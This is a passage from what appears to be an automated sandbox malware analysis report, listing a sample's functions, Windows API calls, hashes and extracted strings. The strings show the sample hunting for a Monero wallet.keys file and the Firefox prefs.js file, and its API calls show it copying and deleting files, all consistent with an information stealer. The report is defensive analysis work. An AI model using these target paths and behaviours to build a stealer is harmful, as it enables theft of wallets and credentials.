                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: ed9bbeed5c9a0dca5a87ec2e94e5e89a980f24fb6cc984b7eb8b9c8e037e6cab
                        • Instruction ID: 508ae36eb456311dd283dc08cf52a25fe26cea529061427cfe904d9f08642a96
                        • Opcode Fuzzy Hash: ed9bbeed5c9a0dca5a87ec2e94e5e89a980f24fb6cc984b7eb8b9c8e037e6cab
                        • Instruction Fuzzy Hash: D76197B6940218ABDB34EBA0EC45EEA737CFF88701F404598B50A96045EB35EBC5DF91
                        Function 00F14570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F14580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F14587
                        • wsprintfA.USER32 ref: 00F145A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 00F145BD
                        • StrCmpCA.SHLWAPI(?,00F20FC4), ref: 00F145EB
                        • StrCmpCA.SHLWAPI(?,00F20FC8), ref: 00F14601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1468B
                        • FindClose.KERNEL32(000000FF), ref: 00F146A0
                        • lstrcat.KERNEL32(?,008AF2A8), ref: 00F146C5
                        • lstrcat.KERNEL32(?,008ADDF8), ref: 00F146D8
                        • lstrlen.KERNEL32(?), ref: 00F146E5
                        • lstrlen.KERNEL32(?), ref: 00F146F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 5ed3cbb9acf3e1c7ee609ec24168255eaa5f23e10d32f03944e3226080ea76ff
                        • Instruction ID: 17dd8fa3acc56565d4636a39dd672abf78cf8b65e32800e35f561d47e6e49276
                        • Opcode Fuzzy Hash: 5ed3cbb9acf3e1c7ee609ec24168255eaa5f23e10d32f03944e3226080ea76ff
                        • Instruction Fuzzy Hash: FD51C4B6940218ABCB34EB70EC89FED737CAF58701F404598B61A93084EB749BC49F91
                        Function 00F13EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00F13EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00F13EDA
                        • StrCmpCA.SHLWAPI(?,00F20FAC), ref: 00F13F08
                        • StrCmpCA.SHLWAPI(?,00F20FB0), ref: 00F13F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1406C
                        • FindClose.KERNEL32(000000FF), ref: 00F14081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 7478cf8a74da8c662060b86f6f5838154cdd69b8eb23fc42cc00625adbdd18cb
                        • Instruction ID: a94574b518a0966d53f08b8bb90343f3dfed9181733ffe86a4bcfddd7bd34ab2
                        • Opcode Fuzzy Hash: 7478cf8a74da8c662060b86f6f5838154cdd69b8eb23fc42cc00625adbdd18cb
                        • Instruction Fuzzy Hash: 695166B6900218ABDB24EBB0DC45EEA737CFF48700F404598B65A96084EB75EBC59F51
                        Function 00F0ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00F0ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 00F0ED55
                        • StrCmpCA.SHLWAPI(?,00F21538), ref: 00F0EDAB
                        • StrCmpCA.SHLWAPI(?,00F2153C), ref: 00F0EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0F2AE
                        • FindClose.KERNEL32(000000FF), ref: 00F0F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 9db2e5c914c9921b9d8645d77137f99a225d6dfd445b5cd09e3d4fe7ec7b9adb
                        • Instruction ID: 2918edbb1a4487c6c00019857207a6320b61a71baf38a6386849a5f7605d70f1
                        • Opcode Fuzzy Hash: 9db2e5c914c9921b9d8645d77137f99a225d6dfd445b5cd09e3d4fe7ec7b9adb
                        • Instruction Fuzzy Hash: B0E1F4729121189AEB55FB60DD52EEE733CAF54320F4045E9B40A62092EF346FCAEF51
                        Function 00F0F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F215B8,00F20D96), ref: 00F0F71E
                        • StrCmpCA.SHLWAPI(?,00F215BC), ref: 00F0F76F
                        • StrCmpCA.SHLWAPI(?,00F215C0), ref: 00F0F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0FAB1
                        • FindClose.KERNEL32(000000FF), ref: 00F0FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 38a6690d770a0f7309b64f0fa407a318d0065573abc33bf24501e7d7e88c2c72
                        • Instruction ID: b89954ace206fabb2de789c7f815613c9bae899905fd1d2f7fe478e0cf56e352
                        • Opcode Fuzzy Hash: 38a6690d770a0f7309b64f0fa407a318d0065573abc33bf24501e7d7e88c2c72
                        • Instruction Fuzzy Hash: F7B154719011189BDB24FF60DD56FED7379AF54310F4081A8A40A971C1EF39AB8AEF92
                        Function 00F016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F2510C,?,?,?,00F251B4,?,?,00000000,?,00000000), ref: 00F01923
                        • StrCmpCA.SHLWAPI(?,00F2525C), ref: 00F01973
                        • StrCmpCA.SHLWAPI(?,00F25304), ref: 00F01989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F01D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00F01DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F01E20
                        • FindClose.KERNEL32(000000FF), ref: 00F01E32
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: f4b310b73b68bf81b7ea041b2f3aa115b1db48ba83d4519bca6ed60149fcddc2
                        • Instruction ID: 5a5fc3865f500a44517cb965f7251a43bd7d0dd98be397fffa1190f53b77c94a
                        • Opcode Fuzzy Hash: f4b310b73b68bf81b7ea041b2f3aa115b1db48ba83d4519bca6ed60149fcddc2
                        • Instruction Fuzzy Hash: 7F1244719111189BDB19FB60DD96EEE7378AF54320F404199B10A620D1EF386FCAEF92
                        Function 00F0DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F20C2E), ref: 00F0DE5E
                        • StrCmpCA.SHLWAPI(?,00F214C8), ref: 00F0DEAE
                        • StrCmpCA.SHLWAPI(?,00F214CC), ref: 00F0DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0E3E0
                        • FindClose.KERNEL32(000000FF), ref: 00F0E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 045670034b1b15a417f82f5da3ded8856457c5d0c0e1468d243bbb6a3b0ad29a
                        • Instruction ID: d6b45bd3d5ee2e69b5cbeddc30f5080e0257bfd088e1ddbe227b33da4a259e82
                        • Opcode Fuzzy Hash: 045670034b1b15a417f82f5da3ded8856457c5d0c0e1468d243bbb6a3b0ad29a
                        • Instruction Fuzzy Hash: 1AF1A3718151189ADB29FB60DD95EEE7338BF14320F8041E9B41A62091EF356FCAEF52
                        Function 012C322F Relevance: 14.1, Strings: 10, Instructions: 1570COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (x$3}^$:}b$;Xm;$A4$Gt_e$T"j$_B}$aV;$c]~{
                        • API String ID: 0-669431359
                        • Opcode ID: 1817b01fd708dfccb8960fb111a7eeeb8c01b590eb645984aa14011d1045ee1c
                        • Instruction ID: 08c6b795c6378c9e886c19c53fd9a72f5193ee0c32c43cdce4aba2ce85259d4d
                        • Opcode Fuzzy Hash: 1817b01fd708dfccb8960fb111a7eeeb8c01b590eb645984aa14011d1045ee1c
                        • Instruction Fuzzy Hash: 59B204F390C2009FE704AE29EC8567AFBE5EF94720F1A493DE6C587744EA3558448787
                        Function 00F0DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F214B0,00F20C2A), ref: 00F0DAEB
                        • StrCmpCA.SHLWAPI(?,00F214B4), ref: 00F0DB33
                        • StrCmpCA.SHLWAPI(?,00F214B8), ref: 00F0DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0DDCC
                        • FindClose.KERNEL32(000000FF), ref: 00F0DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 676c179d8d29f8668821a411315ed8480cedebeedc5bf7cbb982b93b3eda49d9
                        • Instruction ID: 0cd6a67afb6ce2a142535fd35c65a7d9db3b2584ef3601ee07a6bbf27aad95c6
                        • Opcode Fuzzy Hash: 676c179d8d29f8668821a411315ed8480cedebeedc5bf7cbb982b93b3eda49d9
                        • Instruction Fuzzy Hash: 0991677290010497DB14FBB0ED569ED737CAF94310F408668F81A961C5FF389B99EB92
                        Function 00F17B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,00F205AF), ref: 00F17BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F17BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00F17C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F17C62
                        • LocalFree.KERNEL32(00000000), ref: 00F17D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
